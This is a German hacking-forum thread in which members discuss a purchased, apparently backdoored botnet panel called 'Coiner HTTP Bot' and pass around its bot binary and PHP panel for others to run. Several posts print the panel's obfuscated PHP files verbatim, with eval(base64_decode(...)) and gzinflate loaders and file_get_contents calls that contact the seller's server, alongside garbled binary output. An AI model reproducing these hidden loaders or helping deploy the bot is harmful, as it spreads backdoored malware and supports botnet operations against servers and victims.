22 Antworten in diesem Thema

[syrius]

Achtung - Bitte genau lesen!

Hallo,

habe vor wenigen Tagen einen Bot namens "Coiner HTTP Bot" auf hackforums gekauft der wohl backdoored ist. Nach installation und Inbetriebnahme auf einem eigens dafür eingerichteten vServer war kurzerhand später mein MySQL geknackt (alle Benutzertabellen gelöscht). Das passierte ca 1-2 Minuten nach der Inbetriebnahme. Server wurde natürlich gleich neu installiert!

Die Binary connected wie gewünscht auf den host

Please Login HERE or Register HERE to see this link!

und spricht die "run.php" aus dem root-DIR an. Passt also. Beim aufrufen des Panels wird eine customer.php bzw. newcustomer.php auf deren Server angesprochen. Weiter habe ich das Teil nicht mehr auseinander genommen. Nachdem er die Binary nicht gleich bereitgestellt hat (angeblich wartet er auf seinen Entwickler) hat er mir dann ein Tag später ein zweites Panel geschickt wobei er meinte der Bot würde nur noch damit funktionieren - im alten Panel hat er aber den News-Link zum 2. Panel nicht aktualisiert ... also alles sehr merkwürdig.

Im Download enthalten ist:
- 1st_panel
- 2nd_panel
- svchost.exe (Bot-Binary)

Ich stelle euch das hier bereit in der Hoffnung den vielleicht doch noch in Betrieb nehmen zu können - wenn nicht kümmerts mich ehrlich gesagt auch nicht aber die Funktionen zumindest wie beschrieben, sind schon beachtlich!

Gezahlt habe ich dafür 100$ in BTC - reden wir nicht drüber ist mir irgendwo auch egal.

Es wäre natürlich wünschenswert, wenn jemand den Bot im falle von Erfolg wieder hier bereitgestellt wird!

PS: Passt bitte auf und wenn ihr ihn in Betrieb nehmt schön den Server im Auge behalten - jemand der keine Ahnung hat sollte sich damit nicht beschäftigen!


Virustotal 18/54:

Please Login HERE or Register HERE to see this link!

Achtung! Text auch wirklich gelesen?

Download:

Versteckter Inhalt
Klicke auf den Danke-Button um den versteckten Inhalt sehen zu können. Nur registrierte Mitglieder haben Zugriff hierauf.

[hikhack7]

Wenn du dein Hide-thx wegmachst, kann man die PHP-Files gerne mal anschaun..

[zepsus]

Off-Topic:

Jetzt ohne Spaß ich verstehe einfach nicht wie man was bei hf kaufen kann

und dann auch noch den Server auf Virustotal gescannt

mehr kann man überhaupt nicht falsch machen

[syrius]

Off-Topic:

Jetzt ohne Spaß ich verstehe einfach nicht wie man was bei hf kaufen kann

und dann auch noch den Server auf Virustotal gescannt

mehr kann man überhaupt nicht falsch machen

Das steht nicht zur Rede! Virustotal? Schau dir das Teil doch mal an das muss sowieso crypted werden also mach dir doch nicht ins Hemd. :-D Außerdem wird Virustotal in den Forenregeln noch vorgeschlagen.

Bearbeitet von msgme139, 28 June 2014 - 19:36 Uhr.

[most_uniQue]

Das sagt doch aber schon alles.
Nen Bot, der zum VERKAUF steht, auf VT scannen, damit die Antivir-Hersteller es auch gleich haben und in 1-2 Tagen alles eh keinen Sinn mehr hat, außer du hast Crypter. .png' class='bbc_emoticon' alt='^^' />

[0x92]

Wenn man eins in der Scene lernt, nichts auf HF kaufen..

[Bad Grandpa]

Kannst Rastajan mal fragen ob er mal ein Auge draufwerfen kann

[ProHex]

wieso connected der per tcp zu google? .png' class='bbc_emoticon' alt='o.O' />

[syrius]

Hast du Chrome laufen? Dann ist das ausgehend nämlich vom Browser...

Bearbeitet von msgme139, 29 June 2014 - 01:48 Uhr.

[ProHex]

Hast du Chrome laufen? Dann ist das ausgehend nämlich vom Browser...

nein, das kommt von dem aus.

[syrius]

die footer.php und header.php im ordner "html" sind base64 crypted - hab das mal decrypted aber da steht echt kranker scheiss drin .png' class='bbc_emoticon' alt='^^' />

[ProHex]

die footer.php und header.php im ordner "html" sind base64 crypted - hab das mal decrypted aber da steht echt kranker scheiss drin .png' class='bbc_emoticon' alt='^^' />

nicht nur das:

Please Login HERE or Register HERE to see this link!

Please Login HERE or Register HERE to see this link!

dahin connected das teil.

Zeig mal den base64 decoded teil

[syrius]

header.php
Original

<?php /*** PHP Encode v1.0 by zeura.com ***/ $XnNhAWEnhoiqwciqpoHH=file(__FILE__);eval(base64_decode("aWYoIWZ1bmN0aW9uX2V4aXN0cygiWWl1bklVWTc2YkJodWhOWUlPOCIpKXtmdW5jdGlvbiBZaXVuSVVZNzZiQmh1aE5ZSU84KCRnLCRiPTApeyRhPWltcGxvZGUoIlxuIiwkZyk7JGQ9YXJyYXkoNjU1LDIzNiw0MCk7aWYoJGI9PTApICRmPXN1YnN0cigkYSwkZFswXSwkZFsxXSk7ZWxzZWlmKCRiPT0xKSAkZj1zdWJzdHIoJGEsJGRbMF0rJGRbMV0sJGRbMl0pO2Vsc2UgJGY9dHJpbShzdWJzdHIoJGEsJGRbMF0rJGRbMV0rJGRbMl0pKTtyZXR1cm4oJGYpO319"));eval(base64_decode(YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH)));eval(ZsldkfhGYU87iyihdfsow(YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH,2),YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH,1)));__halt_compiler();aWYoIWZ1bmN0aW9uX2V4aXN0cygiWnNsZGtmaEdZVTg3aXlpaGRmc293Iikpe2Z1bmN0aW9uIFpzbGRrZmhHWVU4N2l5aWhkZnNvdygkYSwkaCl7aWYoJGg9PXNoYTEoJGEpKXtyZXR1cm4oZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoJGEpKSk7fWVsc2V7ZWNobygiRXJyb3I6IEZpbGUgTW9kaWZpZWQiKTt9fX0=bc26a5b7e507733e6489be166c7c3dca6873b341vRdrb9s28PMC5D9chQC2h8jah7XoEttfMhcp5iJBYmwYgsCgpJPNhCIVknJsFPnvO+plW3G7eBtmyBDJex/vJYPGcCVnxjJtu73z4yOg3w/VS+NTzjXOlIyw2+EyCkyJ388WWcdh70GJlEz4fINBz0morFFScIkwhHRtnsRM5ulMq2fTLbdPOep117sdT8YXU/gRPt1cfYFIcJTWwB+X45sxkI42NzD5/NsYOlcFt47Xq2RgtFDQOT4avPv16mL65/UYFjYVIzpwbxBMzoceSm/kTBsskMWj0shBipZBtGDaoB16uU38j14Ns9wKHF0oEqUHQbk7PqqA73wfJkhqrQUa8P2aiBR7hIXGZOiFigy3mmVBZEzQ7Pq080CjGHol9QLRNkKLI7DrDIeexZV1tDUQIFTxGr7WO4CMxTGXc9+q7Aw+/JStzl/DyP1WpWfw8zb4pRIXFPLerryv0WRKGr7Eb9qx5aHL6ZfJezALnp5CojR8Hn/wP4LJs0xpCyqpEFBgWtz1xo9EfccTEJZo4Jf7xgMDE2meWTA62lbywQTuqt+TqGX/gTxGlhWIDb87lDFP7gsJtfFVJBRR4Vy7AcV8SQHIjBl6ki1DpqF8+VwukYKl3iZ8hbFz/+aOXtMSEYXQBmMXh1LGMt5CcArldG+yCoVy49U0oZVAf7/k70HMLCMt5nOBjqEQLDNYHzM9d8HdJ2S/ge3Icm7NmKy5c1LJd3ydF+n8f8EdBKWNu4essVgzGXtVcHIZ48oVGa9JT7ZLt3sHjdnwTftzsYXfhnbOXWAkXOCMXDlzN+bCtestrM3OgiBdRyrGUDEd9yOVBhKfTWDYEqPcUO5RwBTKumrFk27IDEqWYvdkdju++X18c9e5vrym9eRT5743dOnEbEXxtY5IKGvcRmHBa4VZZCkdyamscs+GfjTg6bzMFVoEFUDOvdGtWzq3DQLBR1tWvqAwWIitJJKkf826ZA4v4Pi+xQVV8W85oeWD7zphm0NL1wbktL0oN21993qkUmDHI/+FnFLS271jmXnc9U3bM9/3zYa+pXEFcPpO3XLfLf5diPxT5k2EbFtR27UjQai5yu0+ETXEyZgU60ZIyXfDvZX/QS5a5YhKyMi1oWCncG5a1Aarqfxbu3pNu/bM8MCWrGxO5fnw4N9un4RrwSKMgVmwCwTqc66zumWsotw1VjCq2GdsTsOKUCyGhBmLeovRdl+lqEFrXFN9KEazvR11PwF1Y5oOrBsT307EBGp7AH6qYiYOwI+1ymL1fIhKdEo3brKDbGfhIdhKCcuzAygylSmaPg6gKFvqAQR1mB9CwrTKDb66j2quCorBqkhuyoSTkNEsFNOHwIHdNCr6fChU9Ihx365s1U2hSwMgPd2K8ymxXChjw7WroLBVQi+n0+vZ5dXtlGpor0ffDbjitusNEpLv5gKlhxrj0VhrGlRPIRPIioGBprPIQhY95ZQ2BHpk9CHDJS1jSiCrYE7TGx3QfJsyF/jAQio8sFa5hkphyjyJYhA4WSOv/tKq20kxupKL/gI=

#1

if(!function_exists("YiunIUY76bBhuhNYIO8")){function YiunIUY76bBhuhNYIO8($g,$b=0){$a=implode("n",$g);$d=array(655,236,40);if($b==0) $f=substr($a,$d[0],$d[1]);elseif($b==1) $f=substr($a,$d[0]+$d[1],$d[2]);else $f=trim(substr($a,$d[0]+$d[1]+$d[2]));return($f);}}

#2

if(!function_exists("ZsldkfhGYU87iyihdfsow")){function ZsldkfhGYU87iyihdfsow($a,$h){if($h==sha1($a)){return(gzinflate(base64_decode($a)));}else{echo("Error: File Modified");}}}snNw[{^s7u????oE??<!@-6z?…yX ()$ad>{Vn??2^` Yn|7Rs#,6L"w?–q{be> sj+T"L!g9S*mzuSOW`R%5d#>6m-4O>zFH??3?’$1hbm6^S#??lJAnN??;?’AF?f!q:!b-PY4;><(}@M:!e]m
D<F#1Le%+s?UY<??)D<+Yyhre^?§?lB??D=qq%8%gLA;OboSm|UIxW.q_@r#^P_>W`w!l?„at
?±]?‚?M(eP;sycD]wI/{rf+.??]'EGA)cn,V^xFkSv|~aw???X 8#zk3sQ?±G}AX6;p2d??__o)y:q|mc
pZVY
Grjk???8:o3VP3tkV?­@Q??"+I$n>/AU|[hy`??f-/J
_}?©1gX^w=SvaA>b?avHj.rOMq2f:?’2]eKb2-hX)
?“n<0%~|87?§H Vl:k(
U*!b??]jZJG]O]X??«?±
#r_"?¬HvrJf
Af?°2o?«j$4K4 wM
="w5ShRwblW
j,Pyu{e+n8Da??V?•D"`iye
=pKX?€*t&?…0,ar"XHLn

[syrius]

Original footer.php

<?php /*** PHP Encode v1.0 by zeura.com ***/ $XnNhAWEnhoiqwciqpoHH=file(__FILE__);eval(base64_decode("aWYoIWZ1bmN0aW9uX2V4aXN0cygiWWl1bklVWTc2YkJodWhOWUlPOCIpKXtmdW5jdGlvbiBZaXVuSVVZNzZiQmh1aE5ZSU84KCRnLCRiPTApeyRhPWltcGxvZGUoIlxuIiwkZyk7JGQ9YXJyYXkoNjU1LDIzNiw0MCk7aWYoJGI9PTApICRmPXN1YnN0cigkYSwkZFswXSwkZFsxXSk7ZWxzZWlmKCRiPT0xKSAkZj1zdWJzdHIoJGEsJGRbMF0rJGRbMV0sJGRbMl0pO2Vsc2UgJGY9dHJpbShzdWJzdHIoJGEsJGRbMF0rJGRbMV0rJGRbMl0pKTtyZXR1cm4oJGYpO319"));eval(base64_decode(YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH)));eval(ZsldkfhGYU87iyihdfsow(YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH,2),YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH,1)));__halt_compiler();aWYoIWZ1bmN0aW9uX2V4aXN0cygiWnNsZGtmaEdZVTg3aXlpaGRmc293Iikpe2Z1bmN0aW9uIFpzbGRrZmhHWVU4N2l5aWhkZnNvdygkYSwkaCl7aWYoJGg9PXNoYTEoJGEpKXtyZXR1cm4oZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoJGEpKSk7fWVsc2V7ZWNobygiRXJyb3I6IEZpbGUgTW9kaWZpZWQiKTt9fX0=7e707aadb2f7261f8ab96abece4dda6903040434TY2xDoJAEER7E/9hcg2VoMZOoLE28RfO3VU2EfY8DhP+XgIanWpm3iQj1BgyACXrC8qVu5klia5erzBrBvTwfV85si557f7xNAhf3A5JGBSFNbn6ZGGMem8SziMZy9V85JysxQYXeg6esd/uDnlZhN9ZMb190uKXPju+AQ==

#1

if(!function_exists("YiunIUY76bBhuhNYIO8")){function YiunIUY76bBhuhNYIO8($g,$b=0){$a=implode("n",$g);$d=array(655,236,40);if($b==0) $f=substr($a,$d[0],$d[1]);elseif($b==1) $f=substr($a,$d[0]+$d[1],$d[2]);else $f=trim(substr($a,$d[0]+$d[1]+$d[2]));return($f);}}

encoded #2 - das hier ausm Original scheint irgendwas anderes zu sein. Dachte erst an einen SSH-Key

aWYoIWZ1bmN0aW9uX2V4aXN0cygiWnNsZGtmaEdZVTg3aXlpaGRmc293Iikpe2Z1bmN0aW9uIFpzbGRrZmhHWVU4N2l5aWhkZnNvdygkYSwkaCl7aWYoJGg9PXNoYTEoJGEpKXtyZXR1cm4oZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoJGEpKSk7fWVsc2V7ZWNobygiRXJyb3I6IEZpbGUgTW9kaWZpZWQiKTt9fX0=7e707aadb2f7261f8ab96abece4dda6903040434TY2xDoJAEER7E/9hcg2VoMZOoLE28RfO3VU2EfY8DhP+XgIanWpm3iQj1BgyACXrC8qVu5klia5erzBrBvTwfV85si557f7xNAhf3A5JGBSFNbn6ZGGMem8SziMZy9V85JysxQYXeg6esd/uDnlZhN9ZMb190uKXPju+AQ==

#EDIT: Doch OMG Das #2 ist ein SSH-Key .png' class='bbc_emoticon' alt='o.O' /> solche wi**ser!!

Bearbeitet von msgme139, 29 June 2014 - 02:17 Uhr.

[ProHex]

header.php
Original

<?php /*** PHP Encode v1.0 by zeura.com ***/ $XnNhAWEnhoiqwciqpoHH=file(__FILE__);eval(base64_decode("aWYoIWZ1bmN0aW9uX2V4aXN0cygiWWl1bklVWTc2YkJodWhOWUlPOCIpKXtmdW5jdGlvbiBZaXVuSVVZNzZiQmh1aE5ZSU84KCRnLCRiPTApeyRhPWltcGxvZGUoIlxuIiwkZyk7JGQ9YXJyYXkoNjU1LDIzNiw0MCk7aWYoJGI9PTApICRmPXN1YnN0cigkYSwkZFswXSwkZFsxXSk7ZWxzZWlmKCRiPT0xKSAkZj1zdWJzdHIoJGEsJGRbMF0rJGRbMV0sJGRbMl0pO2Vsc2UgJGY9dHJpbShzdWJzdHIoJGEsJGRbMF0rJGRbMV0rJGRbMl0pKTtyZXR1cm4oJGYpO319"));eval(base64_decode(YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH)));eval(ZsldkfhGYU87iyihdfsow(YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH,2),YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH,1)));__halt_compiler();aWYoIWZ1bmN0aW9uX2V4aXN0cygiWnNsZGtmaEdZVTg3aXlpaGRmc293Iikpe2Z1bmN0aW9uIFpzbGRrZmhHWVU4N2l5aWhkZnNvdygkYSwkaCl7aWYoJGg9PXNoYTEoJGEpKXtyZXR1cm4oZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoJGEpKSk7fWVsc2V7ZWNobygiRXJyb3I6IEZpbGUgTW9kaWZpZWQiKTt9fX0=bc26a5b7e507733e6489be166c7c3dca6873b341vRdrb9s28PMC5D9chQC2h8jah7XoEttfMhcp5iJBYmwYgsCgpJPNhCIVknJsFPnvO+plW3G7eBtmyBDJex/vJYPGcCVnxjJtu73z4yOg3w/VS+NTzjXOlIyw2+EyCkyJ388WWcdh70GJlEz4fINBz0morFFScIkwhHRtnsRM5ulMq2fTLbdPOep117sdT8YXU/gRPt1cfYFIcJTWwB+X45sxkI42NzD5/NsYOlcFt47Xq2RgtFDQOT4avPv16mL65/UYFjYVIzpwbxBMzoceSm/kTBsskMWj0shBipZBtGDaoB16uU38j14Ns9wKHF0oEqUHQbk7PqqA73wfJkhqrQUa8P2aiBR7hIXGZOiFigy3mmVBZEzQ7Pq080CjGHol9QLRNkKLI7DrDIeexZV1tDUQIFTxGr7WO4CMxTGXc9+q7Aw+/JStzl/DyP1WpWfw8zb4pRIXFPLerryv0WRKGr7Eb9qx5aHL6ZfJezALnp5CojR8Hn/wP4LJs0xpCyqpEFBgWtz1xo9EfccTEJZo4Jf7xgMDE2meWTA62lbywQTuqt+TqGX/gTxGlhWIDb87lDFP7gsJtfFVJBRR4Vy7AcV8SQHIjBl6ki1DpqF8+VwukYKl3iZ8hbFz/+aOXtMSEYXQBmMXh1LGMt5CcArldG+yCoVy49U0oZVAf7/k70HMLCMt5nOBjqEQLDNYHzM9d8HdJ2S/ge3Icm7NmKy5c1LJd3ydF+n8f8EdBKWNu4essVgzGXtVcHIZ48oVGa9JT7ZLt3sHjdnwTftzsYXfhnbOXWAkXOCMXDlzN+bCtestrM3OgiBdRyrGUDEd9yOVBhKfTWDYEqPcUO5RwBTKumrFk27IDEqWYvdkdju++X18c9e5vrym9eRT5743dOnEbEXxtY5IKGvcRmHBa4VZZCkdyamscs+GfjTg6bzMFVoEFUDOvdGtWzq3DQLBR1tWvqAwWIitJJKkf826ZA4v4Pi+xQVV8W85oeWD7zphm0NL1wbktL0oN21993qkUmDHI/+FnFLS271jmXnc9U3bM9/3zYa+pXEFcPpO3XLfLf5diPxT5k2EbFtR27UjQai5yu0+ETXEyZgU60ZIyXfDvZX/QS5a5YhKyMi1oWCncG5a1Aarqfxbu3pNu/bM8MCWrGxO5fnw4N9un4RrwSKMgVmwCwTqc66zumWsotw1VjCq2GdsTsOKUCyGhBmLeovRdl+lqEFrXFN9KEazvR11PwF1Y5oOrBsT307EBGp7AH6qYiYOwI+1ymL1fIhKdEo3brKDbGfhIdhKCcuzAygylSmaPg6gKFvqAQR1mB9CwrTKDb66j2quCorBqkhuyoSTkNEsFNOHwIHdNCr6fChU9Ihx365s1U2hSwMgPd2K8ymxXChjw7WroLBVQi+n0+vZ5dXtlGpor0ffDbjitusNEpLv5gKlhxrj0VhrGlRPIRPIioGBprPIQhY95ZQ2BHpk9CHDJS1jSiCrYE7TGx3QfJsyF/jAQio8sFa5hkphyjyJYhA4WSOv/tKq20kxupKL/gI=

#1

if(!function_exists("YiunIUY76bBhuhNYIO8")){function YiunIUY76bBhuhNYIO8($g,$b=0){$a=implode("n",$g);$d=array(655,236,40);if($b==0) $f=substr($a,$d[0],$d[1]);elseif($b==1) $f=substr($a,$d[0]+$d[1],$d[2]);else $f=trim(substr($a,$d[0]+$d[1]+$d[2]));return($f);}}

#2

if(!function_exists("ZsldkfhGYU87iyihdfsow")){function ZsldkfhGYU87iyihdfsow($a,$h){if($h==sha1($a)){return(gzinflate(base64_decode($a)));}else{echo("Error: File Modified");}}}snNw[{^s7u????oE??<!@-6z?…yX ()$ad>{Vn??2^` Yn|7Rs#,6L"w?–q{be> sj+T"L!g9S*mzuSOW`R%5d#>6m-4O>zFH??3?’$1hbm6^S#??lJAnN??;?’AF?f!q:!b-PY4;><(}@M:!e]m
D<F#1Le%+s?UY<??)D<+Yyhre^?§?lB??D=qq%8%gLA;OboSm|UIxW.q_@r#^P_>W`w!l?„at
?±]?‚?M(eP;sycD]wI/{rf+.??]'EGA)cn,V^xFkSv|~aw???X 8#zk3sQ?±G}AX6;p2d??__o)y:q|mc
pZVY
Grjk???8:o3VP3tkV?­@Q??"+I$n>/AU|[hy`????f-/J
_}?©1gX^w=SvaA>b?avHj.rOMq2f:?’2]eKb2-hX)
?“n<0%~|87?§H Vl:k(
U*!b??]jZJG]O]X??«?±
#r_"?¬HvrJf
Af?°2o?«j$4K4 wM
="w5ShRwblW
j,Pyu{e+n8Da??V?•D"`iye
=pKX?€*t&?…0,ar"XHLn

if(!function_exists("ZsldkfhGYU87iyihdfsow")){function ZsldkfhGYU87iyihdfsow($a,$h){if($h==sha1($a)){return(gzinflate(base64_decode($a)));}else{echo("Error: File Modified");}}}

#2

[conteaza]

what's the password of archive?

[pdr0]

Original footer.php

<?php /*** PHP Encode v1.0 by zeura.com ***/ $XnNhAWEnhoiqwciqpoHH=file(__FILE__);eval(base64_decode("aWYoIWZ1bmN0aW9uX2V4aXN0cygiWWl1bklVWTc2YkJodWhOWUlPOCIpKXtmdW5jdGlvbiBZaXVuSVVZNzZiQmh1aE5ZSU84KCRnLCRiPTApeyRhPWltcGxvZGUoIlxuIiwkZyk7JGQ9YXJyYXkoNjU1LDIzNiw0MCk7aWYoJGI9PTApICRmPXN1YnN0cigkYSwkZFswXSwkZFsxXSk7ZWxzZWlmKCRiPT0xKSAkZj1zdWJzdHIoJGEsJGRbMF0rJGRbMV0sJGRbMl0pO2Vsc2UgJGY9dHJpbShzdWJzdHIoJGEsJGRbMF0rJGRbMV0rJGRbMl0pKTtyZXR1cm4oJGYpO319"));eval(base64_decode(YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH)));eval(ZsldkfhGYU87iyihdfsow(YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH,2),YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH,1)));__halt_compiler();aWYoIWZ1bmN0aW9uX2V4aXN0cygiWnNsZGtmaEdZVTg3aXlpaGRmc293Iikpe2Z1bmN0aW9uIFpzbGRrZmhHWVU4N2l5aWhkZnNvdygkYSwkaCl7aWYoJGg9PXNoYTEoJGEpKXtyZXR1cm4oZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoJGEpKSk7fWVsc2V7ZWNobygiRXJyb3I6IEZpbGUgTW9kaWZpZWQiKTt9fX0=7e707aadb2f7261f8ab96abece4dda6903040434TY2xDoJAEER7E/9hcg2VoMZOoLE28RfO3VU2EfY8DhP+XgIanWpm3iQj1BgyACXrC8qVu5klia5erzBrBvTwfV85si557f7xNAhf3A5JGBSFNbn6ZGGMem8SziMZy9V85JysxQYXeg6esd/uDnlZhN9ZMb190uKXPju+AQ==

#1

if(!function_exists("YiunIUY76bBhuhNYIO8")){function YiunIUY76bBhuhNYIO8($g,$b=0){$a=implode("n",$g);$d=array(655,236,40);if($b==0) $f=substr($a,$d[0],$d[1]);elseif($b==1) $f=substr($a,$d[0]+$d[1],$d[2]);else $f=trim(substr($a,$d[0]+$d[1]+$d[2]));return($f);}}

encoded #2 - das hier ausm Original scheint irgendwas anderes zu sein. Dachte erst an einen SSH-Key

aWYoIWZ1bmN0aW9uX2V4aXN0cygiWnNsZGtmaEdZVTg3aXlpaGRmc293Iikpe2Z1bmN0aW9uIFpzbGRrZmhHWVU4N2l5aWhkZnNvdygkYSwkaCl7aWYoJGg9PXNoYTEoJGEpKXtyZXR1cm4oZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoJGEpKSk7fWVsc2V7ZWNobygiRXJyb3I6IEZpbGUgTW9kaWZpZWQiKTt9fX0=7e707aadb2f7261f8ab96abece4dda6903040434TY2xDoJAEER7E/9hcg2VoMZOoLE28RfO3VU2EfY8DhP+XgIanWpm3iQj1BgyACXrC8qVu5klia5erzBrBvTwfV85si557f7xNAhf3A5JGBSFNbn6ZGGMem8SziMZy9V85JysxQYXeg6esd/uDnlZhN9ZMb190uKXPju+AQ==

#EDIT: Doch OMG Das #2 ist ein SSH-Key .png' class='bbc_emoticon' alt='o.O' /> solche wi**ser!!

Hallo,

der Code ist nicht verschlüsselt er ist nur, wie der Name schon sagt, encoded (obfuscated), dass kann hier gemacht werden:

Please Login HERE or Register HERE to see this link!

.

Ihr könntet php debuggen und warten bis der Code decoded im Speicher liegt oder das Kommandozeilentool nutzen .

$ php html/footer.php
<div id="footer">
	 <div class="container">
	 <p class="muted credit">Copyright Mycodeboard.com - Pcquad 2014.</p>
	 </div>
</div>	

Edit:
Bevor ihr das mit der Header "zuhause" macht, solltet ihr eure IP vielleicht ...

$banned = file_get_contents("[url="http://mycodeboard.com/news/coinerblocked.txt"]http://mycodeboard.c...nerblocked.txt"[/url]);
file_get_contents("[url="http://mycodeboard.com/news/savecustomers.php"]http://mycodeboard.c...ecustomers.php"[/url]);

(Ausserdem habe ich ProHex aus den Qoutes entfernt, passte doch so nicht ganz )
Oder ihr macht es wie im Hide:

Versteckter Inhalt
Klicke auf den Danke-Button um den versteckten Inhalt sehen zu können. Nur registrierte Mitglieder haben Zugriff hierauf.

Wie ist das Passwort für das zip? Geht auch per PN

[pekeinfo]

good job, i don't see but thx for share. i go to try and comment

[Naws]

Nice leak, I will try it =)

[pdr0]

good job, i don't see but thx for share. i go to try and comment

You can see the hidden content if you click the "thx"-button. If you like a post click also on "gefällt mir" Button (the green button, it's a "like" button).